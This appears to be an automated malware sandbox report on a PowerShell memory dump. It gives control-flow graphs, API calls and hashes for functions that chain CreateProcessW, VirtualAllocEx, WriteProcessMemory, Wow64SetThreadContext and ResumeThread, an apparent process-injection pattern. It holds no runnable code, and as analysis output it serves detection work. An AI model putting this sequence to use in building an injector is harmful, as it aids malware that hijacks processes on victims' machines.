                                                                                                                                                                                                                                  Function 04789728 Relevance: 5.0, APIs: 3, Instructions: 506memorythreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 170 4789728-47897d9 174 47897df-47897ef 170->174 175 4789f11-4789f26 170->175 178 47897f8 174->178 179 47897f1-47897f6 174->179 181 47897fa-47897fc 178->181 179->181 182 47897fe-4789811 181->182 183 4789813-4789832 call 4788268 181->183 182->183 187 478983b 183->187 188 4789834-4789839 183->188 189 478983d-478983f 187->189 188->189 190 4789845-478985a 189->190 191 4789e87-4789e9a 189->191 194 4789860-4789884 190->194 195 4789e82 190->195 198 4789ea1-4789eb7 191->198 194->198 201 478988a-478989d call 4788274 194->201 195->191 198->175 205 4789eb9-4789ec3 198->205 206 47898a3-47898aa 201->206 207 4789e25-4789e27 201->207 212 4789ece-4789ed0 205->212 213 4789ec5-4789ecc 205->213 208 4789e0b-4789e1e 206->208 209 47898b0-47898ba 206->209 208->207 209->198 211 47898c0-47898dd 209->211 211->195 215 47898e3-47898fd call 4788280 211->215 216 4789ed2-4789ed6 212->216 213->216 223 4789e2c 215->223 224 4789903-478990a 215->224 218 4789ed8 call 47875d4 216->218 219 4789edd-4789eea 216->219 218->219 234 4789ef1-4789f0e 219->234 230 4789e33 223->230 226 4789910-4789919 224->226 227 4789df1-4789e04 224->227 228 478991b-478995f 226->228 229 4789984-478998a 226->229 227->208 237 4789968-4789974 228->237 238 4789961-4789967 228->238 229->195 232 4789990-47899a0 229->232 236 4789e3d 230->236 232->195 243 47899a6-47899f9 VirtualAllocEx 232->243 241 4789e44 236->241 237->230 242 478997a-478997e 237->242 238->237 246 4789e4b 241->246 242->229 245 4789dd7-4789dea 242->245 249 47899fb-4789a01 243->249 250 4789a02-4789a20 243->250 245->227 252 4789e52 246->252 249->250 250->236 251 4789a26-4789a2d 250->251 255 4789a33-4789a3a 251->255 256 4789ab4-4789abb 251->256 259 4789e59 252->259 255->241 257 4789a40-4789a47 255->257 256->246 258 4789ac1-4789ac8 256->258 257->256 260 4789a49-4789a9b VirtualAllocEx 257->260 261 4789dbd-4789dd0 258->261 262 4789ace-4789ae9 call 478828c 258->262 266 4789e63 259->266 263 4789a9d-4789aa3 260->263 264 4789aa4-4789aae 260->264 261->245 262->252 269 4789aef-4789af6 262->269 263->264 264->256 270 4789e6a 266->270 272 4789afc-4789b05 269->272 273 4789da3-4789db6 269->273 276 4789e71 270->276 272->195 275 4789b0b-4789b11 272->275 273->261 275->195 277 4789b17-4789b22 275->277 279 4789e7b 276->279 277->195 282 4789b28-4789b2e 277->282 279->195 283 4789c31-4789c42 282->283 284 4789b34-4789b39 282->284 283->195 287 4789c48-4789c5c call 478828c 283->287 284->195 285 4789b3f-4789b52 284->285 285->195 290 4789b58-4789b6b 285->290 287->270 292 4789c62-4789c69 287->292 290->195 296 4789b71-4789b86 290->296 294 4789d6f-4789d82 292->294 295 4789c6f-4789c75 292->295 311 4789d89-4789d9c 294->311 295->195 297 4789c7b-4789c8c 295->297 296->259 300 4789b8c-4789b90 296->300 297->276 305 4789c92-4789c96 297->305 302 4789b96-4789b9f 300->302 303 4789c17-4789c1a 300->303 302->195 306 4789ba5-4789ba8 302->306 303->195 309 4789c20-4789c23 303->309 307 4789c98-4789c9b 305->307 308 4789ca1-4789ca9 305->308 306->195 310 4789bae-4789bde 306->310 307->308 308->195 312 4789caf-4789cb9 308->312 309->195 313 4789c29-4789c2b 309->313 310->195 324 4789be4-4789bfd call 478828c 310->324 311->273 312->198 314 4789cbf-4789cd1 call 4788298 312->314 313->283 313->284 314->279 319 4789cd7-4789cde 314->319 322 4789d3b-4789d4e 319->322 323 4789ce0-4789d1e ResumeThread 319->323 328 4789d55-4789d68 322->328 325 4789d20-4789d26 323->325 326 4789d27-4789d34 323->326 331 4789c02-4789c04 324->331 325->326 326->328 329 4789d36-4789eec 326->329 328->294 329->234 331->266 334 4789c0a-4789c11 331->334 334->303 334->311
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 047899E2
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04789A84
                                                                                                                                                                                                                                    • Part of subcall function 0478828C: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18A22514,00000000,?,?,?,00000000,00000000,?,04789AE7,?,00000000,?), ref: 0478A35C
                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 04789D07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2390764575-0
                                                                                                                                                                                                                                  • Opcode ID: 7445b43785cb795567d4e7bcc19c541a042b939ce72c4ee4cf9ba16e56628cff
                                                                                                                                                                                                                                  • Instruction ID: 974e1e1b23762bbde09c7de507850147426843307d09a2849e636c960623117a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7445b43785cb795567d4e7bcc19c541a042b939ce72c4ee4cf9ba16e56628cff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4812A2F1B402198FEB24AB75C8547AEB7B2AF85344F1480ACD909EB390DB75AD84CF51
                                                                                                                                                                                                                                  Function 04789725 Relevance: 4.9, APIs: 3, Instructions: 380COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 338 4789725-47897d9 343 47897df-47897ef 338->343 344 4789f11-4789f26 338->344 347 47897f8 343->347 348 47897f1-47897f6 343->348 350 47897fa-47897fc 347->350 348->350 351 47897fe-4789811 350->351 352 4789813-4789832 call 4788268 350->352 351->352 356 478983b 352->356 357 4789834-4789839 352->357 358 478983d-478983f 356->358 357->358 359 4789845-478985a 358->359 360 4789e87-4789e9a 358->360 363 4789860-4789884 359->363 364 4789e82 359->364 367 4789ea1-4789eb7 360->367 363->367 370 478988a-478989d call 4788274 363->370 364->360 367->344 374 4789eb9-4789ec3 367->374 375 47898a3-47898aa 370->375 376 4789e25-4789e27 370->376 381 4789ece-4789ed0 374->381 382 4789ec5-4789ecc 374->382 377 4789e0b-4789e1e 375->377 378 47898b0-47898ba 375->378 377->376 378->367 380 47898c0-47898dd 378->380 380->364 384 47898e3-47898fd call 4788280 380->384 385 4789ed2-4789ed6 381->385 382->385 392 4789e2c 384->392 393 4789903-478990a 384->393 387 4789ed8 call 47875d4 385->387 388 4789edd-4789eea 385->388 387->388 403 4789ef1-4789f0e 388->403 399 4789e33 392->399 395 4789910-4789919 393->395 396 4789df1-4789e04 393->396 397 478991b-478995f 395->397 398 4789984-478998a 395->398 396->377 406 4789968-4789974 397->406 407 4789961-4789967 397->407 398->364 401 4789990-47899a0 398->401 405 4789e3d 399->405 401->364 412 47899a6-47899f9 VirtualAllocEx 401->412 410 4789e44 405->410 406->399 411 478997a-478997e 406->411 407->406 415 4789e4b 410->415 411->398 414 4789dd7-4789dea 411->414 418 47899fb-4789a01 412->418 419 4789a02-4789a20 412->419 414->396 421 4789e52 415->421 418->419 419->405 420 4789a26-4789a2d 419->420 424 4789a33-4789a3a 420->424 425 4789ab4-4789abb 420->425 428 4789e59 421->428 424->410 426 4789a40-4789a47 424->426 425->415 427 4789ac1-4789ac8 425->427 426->425 429 4789a49-4789a9b VirtualAllocEx 426->429 430 4789dbd-4789dd0 427->430 431 4789ace-4789ae9 call 478828c 427->431 435 4789e63 428->435 432 4789a9d-4789aa3 429->432 433 4789aa4-4789aae 429->433 430->414 431->421 438 4789aef-4789af6 431->438 432->433 433->425 439 4789e6a 435->439 441 4789afc-4789b05 438->441 442 4789da3-4789db6 438->442 445 4789e71 439->445 441->364 444 4789b0b-4789b11 441->444 442->430 444->364 446 4789b17-4789b22 444->446 448 4789e7b 445->448 446->364 451 4789b28-4789b2e 446->451 448->364 452 4789c31-4789c42 451->452 453 4789b34-4789b39 451->453 452->364 456 4789c48-4789c5c call 478828c 452->456 453->364 454 4789b3f-4789b52 453->454 454->364 459 4789b58-4789b6b 454->459 456->439 461 4789c62-4789c69 456->461 459->364 465 4789b71-4789b86 459->465 463 4789d6f-4789d82 461->463 464 4789c6f-4789c75 461->464 480 4789d89-4789d9c 463->480 464->364 466 4789c7b-4789c8c 464->466 465->428 469 4789b8c-4789b90 465->469 466->445 474 4789c92-4789c96 466->474 471 4789b96-4789b9f 469->471 472 4789c17-4789c1a 469->472 471->364 475 4789ba5-4789ba8 471->475 472->364 478 4789c20-4789c23 472->478 476 4789c98-4789c9b 474->476 477 4789ca1-4789ca9 474->477 475->364 479 4789bae-4789bde 475->479 476->477 477->364 481 4789caf-4789cb9 477->481 478->364 482 4789c29-4789c2b 478->482 479->364 493 4789be4-4789bfd call 478828c 479->493 480->442 481->367 483 4789cbf-4789cd1 call 4788298 481->483 482->452 482->453 483->448 488 4789cd7-4789cde 483->488 491 4789d3b-4789d4e 488->491 492 4789ce0-4789d1e ResumeThread 488->492 497 4789d55-4789d68 491->497 494 4789d20-4789d26 492->494 495 4789d27-4789d34 492->495 500 4789c02-4789c04 493->500 494->495 495->497 498 4789d36-4789eec 495->498 497->463 498->403 500->435 503 4789c0a-4789c11 500->503 503->472 503->480
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3dbbbd3f36d8a53d2899d4f9698a421d54fc64ab22b0c218c9ca11b0a6fe5329
                                                                                                                                                                                                                                  • Instruction ID: 7d329e3413e9a9a35c5b77af841406364e1ed9640f1601d44514a4876bbb7f9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dbbbd3f36d8a53d2899d4f9698a421d54fc64ab22b0c218c9ca11b0a6fe5329
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AF173B1A40218CFEB20DF75CC44BAABBB6AF85344F1481ADD648A7391DB71AD84CF51
                                                                                                                                                                                                                                  Function 04789720 Relevance: 4.9, APIs: 3, Instructions: 379COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 507 4789720-47897d9 513 47897df-47897ef 507->513 514 4789f11-4789f26 507->514 517 47897f8 513->517 518 47897f1-47897f6 513->518 520 47897fa-47897fc 517->520 518->520 521 47897fe-4789811 520->521 522 4789813-4789832 call 4788268 520->522 521->522 526 478983b 522->526 527 4789834-4789839 522->527 528 478983d-478983f 526->528 527->528 529 4789845-478985a 528->529 530 4789e87-4789e9a 528->530 533 4789860-4789884 529->533 534 4789e82 529->534 537 4789ea1-4789eb7 530->537 533->537 540 478988a-478989d call 4788274 533->540 534->530 537->514 544 4789eb9-4789ec3 537->544 545 47898a3-47898aa 540->545 546 4789e25-4789e27 540->546 551 4789ece-4789ed0 544->551 552 4789ec5-4789ecc 544->552 547 4789e0b-4789e1e 545->547 548 47898b0-47898ba 545->548 547->546 548->537 550 47898c0-47898dd 548->550 550->534 554 47898e3-47898fd call 4788280 550->554 555 4789ed2-4789ed6 551->555 552->555 562 4789e2c 554->562 563 4789903-478990a 554->563 557 4789ed8 call 47875d4 555->557 558 4789edd-4789eea 555->558 557->558 573 4789ef1-4789f0e 558->573 569 4789e33 562->569 565 4789910-4789919 563->565 566 4789df1-4789e04 563->566 567 478991b-478995f 565->567 568 4789984-478998a 565->568 566->547 576 4789968-4789974 567->576 577 4789961-4789967 567->577 568->534 571 4789990-47899a0 568->571 575 4789e3d 569->575 571->534 582 47899a6-47899f9 VirtualAllocEx 571->582 580 4789e44 575->580 576->569 581 478997a-478997e 576->581 577->576 585 4789e4b 580->585 581->568 584 4789dd7-4789dea 581->584 588 47899fb-4789a01 582->588 589 4789a02-4789a20 582->589 584->566 591 4789e52 585->591 588->589 589->575 590 4789a26-4789a2d 589->590 594 4789a33-4789a3a 590->594 595 4789ab4-4789abb 590->595 598 4789e59 591->598 594->580 596 4789a40-4789a47 594->596 595->585 597 4789ac1-4789ac8 595->597 596->595 599 4789a49-4789a9b VirtualAllocEx 596->599 600 4789dbd-4789dd0 597->600 601 4789ace-4789ae9 call 478828c 597->601 605 4789e63 598->605 602 4789a9d-4789aa3 599->602 603 4789aa4-4789aae 599->603 600->584 601->591 608 4789aef-4789af6 601->608 602->603 603->595 609 4789e6a 605->609 611 4789afc-4789b05 608->611 612 4789da3-4789db6 608->612 615 4789e71 609->615 611->534 614 4789b0b-4789b11 611->614 612->600 614->534 616 4789b17-4789b22 614->616 618 4789e7b 615->618 616->534 621 4789b28-4789b2e 616->621 618->534 622 4789c31-4789c42 621->622 623 4789b34-4789b39 621->623 622->534 626 4789c48-4789c5c call 478828c 622->626 623->534 624 4789b3f-4789b52 623->624 624->534 629 4789b58-4789b6b 624->629 626->609 631 4789c62-4789c69 626->631 629->534 635 4789b71-4789b86 629->635 633 4789d6f-4789d82 631->633 634 4789c6f-4789c75 631->634 650 4789d89-4789d9c 633->650 634->534 636 4789c7b-4789c8c 634->636 635->598 639 4789b8c-4789b90 635->639 636->615 644 4789c92-4789c96 636->644 641 4789b96-4789b9f 639->641 642 4789c17-4789c1a 639->642 641->534 645 4789ba5-4789ba8 641->645 642->534 648 4789c20-4789c23 642->648 646 4789c98-4789c9b 644->646 647 4789ca1-4789ca9 644->647 645->534 649 4789bae-4789bde 645->649 646->647 647->534 651 4789caf-4789cb9 647->651 648->534 652 4789c29-4789c2b 648->652 649->534 663 4789be4-4789bfd call 478828c 649->663 650->612 651->537 653 4789cbf-4789cd1 call 4788298 651->653 652->622 652->623 653->618 658 4789cd7-4789cde 653->658 661 4789d3b-4789d4e 658->661 662 4789ce0-4789d1e ResumeThread 658->662 667 4789d55-4789d68 661->667 664 4789d20-4789d26 662->664 665 4789d27-4789d34 662->665 670 4789c02-4789c04 663->670 664->665 665->667 668 4789d36-4789eec 665->668 667->633 668->573 670->605 673 4789c0a-4789c11 670->673 673->642 673->650
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cd7646ba87198e6c65c01848171eb2c5e36d8aea06e2facbe48937200a327d05
                                                                                                                                                                                                                                  • Instruction ID: 24f8ca88c5faf08c225c9f1d45820c2a6bbbd110fd094f8d812a1087524189e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd7646ba87198e6c65c01848171eb2c5e36d8aea06e2facbe48937200a327d05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF174B1A40218CFEB20DF75CC44BAABBB6AF85344F1481ADD649A7391DB70AD84CF51
                                                                                                                                                                                                                                  Function 04788268 Relevance: 1.7, APIs: 1, Instructions: 156processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 677 4788268-4789fa1 679 4789fa9-4789fb0 677->679 680 4789fa3-4789fa6 677->680 681 4789fbb-4789fd1 679->681 682 4789fb2-4789fb8 679->682 680->679 683 4789fdc-478a07f CreateProcessW 681->683 684 4789fd3-4789fd9 681->684 682->681 686 478a088-478a100 683->686 687 478a081-478a087 683->687 684->683 694 478a112-478a119 686->694 695 478a102-478a108 686->695 687->686 696 478a11b-478a12a 694->696 697 478a130 694->697 695->694 696->697 699 478a131 697->699 699->699
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,730A10FC,?), ref: 0478A06C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                                  • Opcode ID: 962397695d3d5412a5ac5ef06d3f8785e5d48bf373614905370b668749d145a1
                                                                                                                                                                                                                                  • Instruction ID: d0fa41d46fe1aacc2d4ce4c2920a073a127226de375b60a36185b650b188e681
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 962397695d3d5412a5ac5ef06d3f8785e5d48bf373614905370b668749d145a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90512871901229DFEF24DF99C840BDDBBB5BF48304F1084AAE909B7250EB71AA85CF50
                                                                                                                                                                                                                                  Function 04789F20 Relevance: 1.7, APIs: 1, Instructions: 155processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 700 4789f20-4789fa1 702 4789fa9-4789fb0 700->702 703 4789fa3-4789fa6 700->703 704 4789fbb-4789fd1 702->704 705 4789fb2-4789fb8 702->705 703->702 706 4789fdc-478a07f CreateProcessW 704->706 707 4789fd3-4789fd9 704->707 705->704 709 478a088-478a100 706->709 710 478a081-478a087 706->710 707->706 717 478a112-478a119 709->717 718 478a102-478a108 709->718 710->709 719 478a11b-478a12a 717->719 720 478a130 717->720 718->717 719->720 722 478a131 720->722 722->722
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,730A10FC,?), ref: 0478A06C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                                  • Opcode ID: 28cd685153f6b3369ebb84addaede69d9150671d7961d18848f52329d63f70ec
                                                                                                                                                                                                                                  • Instruction ID: e0181f3b15c6107e5910b8e8945d82e42bfe198ebfac257cc7f9fd47f42d951f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28cd685153f6b3369ebb84addaede69d9150671d7961d18848f52329d63f70ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60512971D01229DFEB24CF99C840BDDBBB1BF48304F1084AAE909B7250EB71AA85DF50
                                                                                                                                                                                                                                  Function 0478828C Relevance: 1.6, APIs: 1, Instructions: 63injectionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 723 478828c-478a326 725 478a328-478a32e 723->725 726 478a330-478a369 WriteProcessMemory 723->726 725->726 727 478a36b-478a371 726->727 728 478a372-478a393 726->728 727->728
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18A22514,00000000,?,?,?,00000000,00000000,?,04789AE7,?,00000000,?), ref: 0478A35C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: 6ea1e18a6a6416f8358b9260b0d8768a403b8050cb7314bf1a4c8a43e3852ffe
                                                                                                                                                                                                                                  • Instruction ID: bcea8f8335bdf6dc34299834f27a7f5a685293aec4bf66970bdaafbbad9551f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea1e18a6a6416f8358b9260b0d8768a403b8050cb7314bf1a4c8a43e3852ffe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 642104B1900309DFDB10DF9AD985BDEBBF4FB48320F54842AE918A7300D378A944CBA5
                                                                                                                                                                                                                                  Function 0478A2D8 Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 730 478a2d8-478a326 732 478a328-478a32e 730->732 733 478a330-478a369 WriteProcessMemory 730->733 732->733 734 478a36b-478a371 733->734 735 478a372-478a393 733->735 734->735
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18A22514,00000000,?,?,?,00000000,00000000,?,04789AE7,?,00000000,?), ref: 0478A35C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: 718994db3bb2a1d03690dbbb00948a677aef47cae1be3f81c7f017a31dba1683
                                                                                                                                                                                                                                  • Instruction ID: 6d5a2e43d4a258e04cc7538f5c650d73eda95a3ae25f410666588f5a6393dfc0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 718994db3bb2a1d03690dbbb00948a677aef47cae1be3f81c7f017a31dba1683
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0421E4B5900259DFDB10DF9AD984BDEBBF4FB48320F54842AE518A7300D378A945CB65
                                                                                                                                                                                                                                  Function 04788274 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 737 4788274-478a1a8 739 478a1aa-478a1b2 737->739 740 478a1b4-478a1e0 Wow64SetThreadContext 737->740 739->740 741 478a1e9-478a20a 740->741 742 478a1e2-478a1e8 740->742 742->741
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0478989B), ref: 0478A1D3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  • Opcode ID: 3f67ab91a71835dc2fb4a4c362d5e487ac1017ee87a9b757f5fe4abe3754158d
                                                                                                                                                                                                                                  • Instruction ID: 90c4bf63a9fdd9258958c6d0aebaf80e8a59b5645f70f7d9d08cad6282a2ab24
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f67ab91a71835dc2fb4a4c362d5e487ac1017ee87a9b757f5fe4abe3754158d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A111E2B6D007498FDB10DF9AD844B9EFBF5EB88320F14846AE818A7340D778A545CFA1
                                                                                                                                                                                                                                  Function 04788298 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 744 4788298-478a1a8 746 478a1aa-478a1b2 744->746 747 478a1b4-478a1e0 Wow64SetThreadContext 744->747 746->747 748 478a1e9-478a20a 747->748 749 478a1e2-478a1e8 747->749 749->748
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0478989B), ref: 0478A1D3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  • Opcode ID: 0ec18ca956b0711f0907eb832cd66b6d103c0b490b93364add426b3f3850051a
                                                                                                                                                                                                                                  • Instruction ID: 9972e7e7ef467e810ce2971adf090b6032840026138c3e41556137eb210da482
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ec18ca956b0711f0907eb832cd66b6d103c0b490b93364add426b3f3850051a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 901112B2D007498FDB10DF9AD844B9EFBF4EB88320F14842AE818A7300D778A545CFA1
                                                                                                                                                                                                                                  Function 0478A161 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 751 478a161-478a1a8 753 478a1aa-478a1b2 751->753 754 478a1b4-478a1e0 Wow64SetThreadContext 751->754 753->754 755 478a1e9-478a20a 754->755 756 478a1e2-478a1e8 754->756 756->755
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0478989B), ref: 0478A1D3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  • Opcode ID: 827f2f0a54fd2f77ffec7e6ddf526e8b77b1592038ba5fe3363701d08ba97f25
                                                                                                                                                                                                                                  • Instruction ID: 036da45ffcdab01257902e8d6f6e4fcb86f905ca408236fcf7128b4602cdc25f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 827f2f0a54fd2f77ffec7e6ddf526e8b77b1592038ba5fe3363701d08ba97f25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F21104B6D006498FDB10DF9AD844BDEFBF5AB88320F14846AD458A3300D778A545CFA1
